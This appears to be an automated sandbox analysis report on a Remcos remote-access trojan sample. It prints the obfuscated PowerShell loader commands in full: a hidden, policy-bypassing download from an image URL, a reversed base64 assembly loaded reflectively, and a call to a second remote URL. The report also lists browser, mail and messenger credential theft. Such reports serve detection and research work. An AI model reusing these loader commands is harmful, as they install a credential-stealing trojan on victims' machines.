                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rrvrknybgidhfxrdnswxtjkjbwnl"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bmbkdyiuuqvmpdfhediqewfskcwuitz"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $forsakers = 'aqbmacaakaakag4adqbsagwaiaatag4azqagacqauabtafyazqbyahmaaqbvag4avabhagiabablacaalqbhag4azaagacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiaatag4azqagacqabgb1agwabaapacaaewagafsadgbvagkazabdacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiab9acaazqbsahmazqagahsaiabxahiaaqb0agualqbpahuadabwahuadaagaccauabvahcazqbyafmaaablagwabaagahyazqbyahmaaqbvag4aiaboag8adaagageadgbhagkababhagiabablaccaiab9adsaaqbmacaakaakag4adqbsagwaiaatag4azqagacqauabtafyazqbyahmaaqbvag4avabhagiabablacaalqbhag4azaagacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiaatag4azqagacqabgb1agwabaapacaaewagafsadgbvagkazabdacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiab9acaazqbsahmazqagahsaiabxahiaaqb0agualqbpahuadabwahuadaagaccauabvahcazqbyafmaaablagwabaagahyazqbyahmaaqbvag4aiaboag8adaagageadgbhagkababhagiabablaccaiab9adsajabtaguabqbvahiayqbuagqadqbtahmaiaa9acaajwboahqadabwahmaogavac8acgblahmalgbjagwabwb1agqaaqbuageacgb5ac4aywbvag0alwbkahkadabmagwadaa2adeabgavagkabqbhagcazqavahuacabsag8ayqbkac8adgaxadcamwazadeamwa0adkanaa3ac8aygbragwacab5ahmazqb5aguadqb0adqaaqbtahaadwa1adaabgaxac4aagbwagcaiaanadsajabjag8abgblag4abwbzaguacwagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0adsajabpag0abqblag0abwbyagkayqbsagwaeqagad0aiaakagmabwbuaguabgbvahmazqbzac4arabvahcabgbsag8ayqbkaeqayqb0ageakaakag0azqbtag8acgbhag4azab1ag0acwapadsajablagqaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgajabpag0abqblag0abwbyagkayqbsagwaeqapadsajabyaguacwblag4adabpahyazqagad0aiaanadwapabcaeeauwbfadyanabfafmavabbafiavaa+ad4ajwa7acqabwb2aguacgbwageaywbracaapqagaccapaa8aeiaqqbtaeuanga0af8arqboaeqapga+accaowakahcayqbsagwazqbkacaapqagacqazqbkac4asqbuagqazqb4ae8azgaoacqacgblahmazqbuahqaaqb2aguakqa7acqaaabpagcaaabsagkazwboahqazqbkacaapqagacqazqbkac4asqbuagqazqb4ae8azgaoacqabwb2aguacgbwageaywbrackaowakahcayqbsagwazqbkacaalqbnaguaiaawacaalqbhag4azaagacqaaabpagcaaabsagkazwboahqazqbkacaalqbnahqaiaakahcayqbsagwazqbkadsajab3ageababsaguazaagacsapqagacqacgblahmazqbuahqaaqb2agualgbmaguabgbnahqaaaa7acqabablagcayqb0agkabgblacaapqagacqaaabpagcaaabsagkazwboahqazqbkacaalqagacqadwbhagwabablagqaowakag0azqb0aguabwbyagkadabpagmaiaa9acaajablagqalgbtahuaygbzahqacgbpag4azwaoacqadwbhagwabablagqalaagacqabablagcayqb0agkabgblackaowakag8acgbjageacwagad0aiaatagoabwbpag4aiaaoacqabqblahqazqbvahiaaqb0agkaywauafqabwbdaggayqbyaeeacgbyageaeqaoackaiab8acaargbvahiarqbhagmaaaatae8aygbqaguaywb0acaaewagacqaxwagah0akqbbac0amqauac4alqaoacqabqblahqazqbvahiaaqb0agkaywauaewazqbuagcadaboackaxqa7acqacablahiadgbhahmaaqb2aguabgblahmacwblahmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqabwbyagmayqbzackaowakahmaeqbuagkaegblahmaaqbzacaapqagafsauwb5ahmadablag0algbsaguazgbsaguaywb0agkabwbuac4aqqb
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = new-object system.net.webclient;$immemorially = $conenoses.downloaddata($memorandums);$ed = [system.text.encoding]::utf8.getstring($immemorially);$resentive = '<<base64_start>>';$overpack = '<<base64_end>>';$walled = $ed.indexof($resentive);$highlighted = $ed.indexof($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.length;$legatine = $highlighted - $walled;$meteoritic = $ed.substring($walled, $legatine);$orcas = -join ($meteoritic.tochararray() | foreach-object { $_ })[-1..-($meteoritic.length)];$pervasivenesses = [system.convert]::frombase64string($orcas);$synizesis = [system.reflection.assembly]::load($pervasivenesses);$vulcanisms = [dnlib.io.home].getmethod('vai');$vulcanisms.invoke($null, @('0/tbcdi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'msbuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $forsakers = 'aqbmacaakaakag4adqbsagwaiaatag4azqagacqauabtafyazqbyahmaaqbvag4avabhagiabablacaalqbhag4azaagacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiaatag4azqagacqabgb1agwabaapacaaewagafsadgbvagkazabdacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiab9acaazqbsahmazqagahsaiabxahiaaqb0agualqbpahuadabwahuadaagaccauabvahcazqbyafmaaablagwabaagahyazqbyahmaaqbvag4aiaboag8adaagageadgbhagkababhagiabablaccaiab9adsaaqbmacaakaakag4adqbsagwaiaatag4azqagacqauabtafyazqbyahmaaqbvag4avabhagiabablacaalqbhag4azaagacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiaatag4azqagacqabgb1agwabaapacaaewagafsadgbvagkazabdacqauabtafyazqbyahmaaqbvag4avabhagiabablac4auabtafyazqbyahmaaqbvag4aiab9acaazqbsahmazqagahsaiabxahiaaqb0agualqbpahuadabwahuadaagaccauabvahcazqbyafmaaablagwabaagahyazqbyahmaaqbvag4aiaboag8adaagageadgbhagkababhagiabablaccaiab9adsajabtaguabqbvahiayqbuagqadqbtahmaiaa9acaajwboahqadabwahmaogavac8acgblahmalgbjagwabwb1agqaaqbuageacgb5ac4aywbvag0alwbkahkadabmagwadaa2adeabgavagkabqbhagcazqavahuacabsag8ayqbkac8adgaxadcamwazadeamwa0adkanaa3ac8aygbragwacab5ahmazqb5aguadqb0adqaaqbtahaadwa1adaabgaxac4aagbwagcaiaanadsajabjag8abgblag4abwbzaguacwagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0adsajabpag0abqblag0abwbyagkayqbsagwaeqagad0aiaakagmabwbuaguabgbvahmazqbzac4arabvahcabgbsag8ayqbkaeqayqb0ageakaakag0azqbtag8acgbhag4azab1ag0acwapadsajablagqaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0afmadabyagkabgbnacgajabpag0abqblag0abwbyagkayqbsagwaeqapadsajabyaguacwblag4adabpahyazqagad0aiaanadwapabcaeeauwbfadyanabfafmavabbafiavaa+ad4ajwa7acqabwb2aguacgbwageaywbracaapqagaccapaa8aeiaqqbtaeuanga0af8arqboaeqapga+accaowakahcayqbsagwazqbkacaapqagacqazqbkac4asqbuagqazqb4ae8azgaoacqacgblahmazqbuahqaaqb2aguakqa7acqaaabpagcaaabsagkazwboahqazqbkacaapqagacqazqbkac4asqbuagqazqb4ae8azgaoacqabwb2aguacgbwageaywbrackaowakahcayqbsagwazqbkacaalqbnaguaiaawacaalqbhag4azaagacqaaabpagcaaabsagkazwboahqazqbkacaalqbnahqaiaakahcayqbsagwazqbkadsajab3ageababsaguazaagacsapqagacqacgblahmazqbuahqaaqb2agualgbmaguabgbnahqaaaa7acqabablagcayqb0agkabgblacaapqagacqaaabpagcaaabsagkazwboahqazqbkacaalqagacqadwbhagwabablagqaowakag0azqb0aguabwbyagkadabpagmaiaa9acaajablagqalgbtahuaygbzahqacgbpag4azwaoacqadwbhagwabablagqalaagacqabablagcayqb0agkabgblackaowakag8acgbjageacwagad0aiaatagoabwbpag4aiaaoacqabqblahqazqbvahiaaqb0agkaywauafqabwbdaggayqbyaeeacgbyageaeqaoackaiab8acaargbvahiarqbhagmaaaatae8aygbqaguaywb0acaaewagacqaxwagah0akqbbac0amqauac4alqaoacqabqblahqazqbvahiaaqb0agkaywauaewazqbuagcadaboackaxqa7acqacablahiadgbhahmaaqb2aguabgblahmacwblahmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqabwbyagmayqbzackaowakahmaeqbuagkaegblahmaaqbzacaapqagafsauwb5ahmadablag0algbsaguazgbsaguaywb0agkabwbuac4aqqbJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = new-object system.net.webclient;$immemorially = $conenoses.downloaddata($memorandums);$ed = [system.text.encoding]::utf8.getstring($immemorially);$resentive = '<<base64_start>>';$overpack = '<<base64_end>>';$walled = $ed.indexof($resentive);$highlighted = $ed.indexof($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.length;$legatine = $highlighted - $walled;$meteoritic = $ed.substring($walled, $legatine);$orcas = -join ($meteoritic.tochararray() | foreach-object { $_ })[-1..-($meteoritic.length)];$pervasivenesses = [system.convert]::frombase64string($orcas);$synizesis = [system.reflection.assembly]::load($pervasivenesses);$vulcanisms = [dnlib.io.home].getmethod('vai');$vulcanisms.invoke($null, @('0/tbcdi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'msbuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"Jump to behavior
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWK\e
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWK\*
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager)
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWK\04
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWK\25
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWK\/
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWK\6
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWK\
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWK\*
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3633339065.0000000000F34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerWK\b5l
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.drBinary or memory string: [Program Manager]
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerZ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00433E0A cpuid 10_2_00433E0A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,10_2_0040E679
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,10_2_004470AE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,10_2_004510BA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_004511E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,10_2_004512EA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_004513B7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,10_2_00447597
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_2_00450A7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,10_2_00450CF7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,10_2_00450D42
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,10_2_00450DDD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_00450E6A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00404915 GetLocalTime,CreateEventA,CreateThread,10_2_00404915
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041A7A2 GetComputerNameExW,GetUserNameW,10_2_0041A7A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,10_2_0044800F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0041739B GetVersionExW,11_2_0041739B
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data10_2_0040B21B
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \key3.db10_2_0040B335
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.dbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to steal Instant Messenger accounts or passwords
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                      Tries to steal Mail credentials (via file registry)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ESMTPPassword12_2_004033F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3
                      Yara detected WebBrowserPassView password recovery tool
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5648, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-QM0FWKJump to behavior
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: cmd.exe10_2_00405042

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information22
                      Scripting                      		Valid Accounts11
                      Native API                      		22
                      Scripting                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		2
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		1
                      Bypass User Account Control                      		3
                      Obfuscated Files or Information                      		211
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		12
                      Ingress Tool Transfer                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts32
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Access Token Manipulation                      		1
                      Software Packing                      		2
                      Credentials in Registry                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		21
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution                      		Login Hook1
                      Windows Service                      		1
                      DLL Side-Loading                      		3
                      Credentials In Files                      		3
                      File and Directory Discovery                      		Distributed Component Object Model211
                      Input Capture                      		1
                      Non-Standard Port                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts3
                      PowerShell                      		Network Logon Script522
                      Process Injection                      		1
                      Bypass User Account Control                      		LSA Secrets38
                      System Information Discovery                      		SSH3
